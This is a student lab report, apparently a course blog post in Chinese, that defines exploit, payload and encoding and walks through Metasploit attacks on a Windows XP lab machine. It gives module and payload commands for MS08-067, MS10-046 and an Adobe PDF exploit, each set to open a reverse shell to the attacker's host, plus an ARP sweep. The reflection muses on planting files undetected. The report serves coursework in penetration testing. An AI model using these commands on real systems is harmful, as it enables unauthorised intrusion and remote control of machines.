Exp5 MSF基础应用

Exp5 MSF基础应用 20155239吕宇轩

基础问题回答

1、用自己的话解释什么是exploit,payload,encode?

exploit :
Exploit的英文意思就是利用,在做攻击时,通常称为漏洞利用。
一个利用程序(An exploit)就是一段通过触发一个漏洞(或者几个漏洞)进而控制目标系统的代码。
exploits利用代码可以在本地也可在远程进行。一个远程攻击利用允许攻击者远程操纵计算机,理想状态下能够执行任意代码。

payload :
payload属于名词,意为有效载荷,在病毒代码中实现一些有害的或者恶性的动作的部分叫做“有效负载”(payload)。
payload可以实现任何运行在受害者环境中的程序所能做的事情,并且能够执行动作包括破坏文件删除文件,向病毒的作者或者任意的接收者发送敏感信息,以及提供通向被感染计算机的后门。

encode :
encode本意为编码,可在不改变payload功能的情况下对其进行编码,一些好的编码方式可以使攻击或相关的文件不被发现。

实践内容

一、主动攻击:ms08_067漏洞攻击

攻击机:kali linux x64

靶机: windows XP SP3(English)

将windows XP的防火墙关闭;进入msfconsole界面。

1、先用 search ms08_067 指令查询针对该漏洞可以运用的攻击模块:

使用

use exploit/windows/smb/ms08_067_netapi 

使用该模块,并使用

show payloads

查看可以供我们使用的payload:

可查看到有很多可以使用的正常的payload。

2、选择通过反向连接来获取shell的 generic/shell_reverse_tcp 作为payload,使用指令

set payload generic/shell_reverse_tcp

对payload进行设置,并使用 show options 查看:

3、发现源端口和目的端口是默认固定的,需要设置一个RHOST(靶机的IP地址)和一个LHOST(攻击机的IP地址):

使用

  show options 

查看设置结果:

4、接着使用 exploit 指令开始攻击:

5、攻击成功后获取了靶机的shell,此时可使用 systeminfo 指令查看靶机系统信息:

二、对浏览器攻击:ms10_046漏洞攻击

1、利用

 search ms10_046

指令查看可以运用的攻击模块:

2、根据提示,使用

use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

使用该模块,并使用show payloads查看:

3、使用

set payload windows/meterpreter/reverse_tcp 设置payload

,并使用show options查看参数:

SRVHOST填的是本地监听主机的IP地址,LHOST也是监听的IP地址,所以这里SRVHOST和LHOST都应该填攻击机的IP地址:

4、使用xp系统打开链接: http://192.168.52.131:80/

此时kali显示接入一个会话:

5、使用

sessions -i 1

选择会话1,成功获取了靶机的shell,利用 systeminfo 指令查看靶机的系统信息:

三、对Adobe的漏洞攻击

1、先使用search adobe查询和adobe漏洞有关的模块:

2、个人选择:

exploit/windows/fileformat/adobe_cooltype_sing

,然后show payloads查看payload:

3、选择

windows/meterpreter/reverse_tcp

,并使用show options查看参数:

只需建立本地主机IP:LHOST,输入 exploit 将在固定的位置生成相应的文件:

5、在文件查看处选择显示隐藏文件,在相应的位置找到msf.pdf:

6、将文件拷贝至windows XP下,并在kali下输入:

use exploit/multi/handler
set LHOST 192.168.220.130
set LPORT 4444
exploit

7、将win XP下的PDF打开,攻击机成功获取到靶机shell:

四、辅助模块的应用

1、使用 show auxiliary 查看可以运用的辅助模块:

选择ARP扫描,使用命令: use scanner/discovery/arp_sweep ,并使用show options查看参数:

只需设置目的主机IP即可:

也可设置一个网段进行扫描:

实验总结与体会

通过对MSF攻击的学习,我对课堂中的只是进行了实践,对于渗透测试有了更深的理解。若要将攻击运用到实践中,还需不断地研究各类新型的漏洞,并获取更高的权限对其他主机进行扫描和注入。

离实战还缺些什么技术或步骤?
1、在实践中发现MSF攻击的局限性很大,其中的漏洞几乎都是针对win XP系统,而实际应用的系统大部分是win7及以上的系统,如果需要实战攻击win7及以上的系统,还需要不断发现并成功利用新的漏洞。
2、需要提高扫描等信息收集技术,信息收集是做攻击的重要前提,但大多数初级的扫描都会被win7及以上的系统发现甚至拒绝,所以提供相应的技术很重要。
3、在对Adobe的漏洞攻击中,需要把PDF文件植入被攻击主机,如果在不被发现植入危险的文件的情况下成功将攻击所需文件植入靶机,也是一个值得深思的问题。

posted on 2018-05-02 23:58  吕宇轩  阅读(197)  评论(0编辑  收藏  举报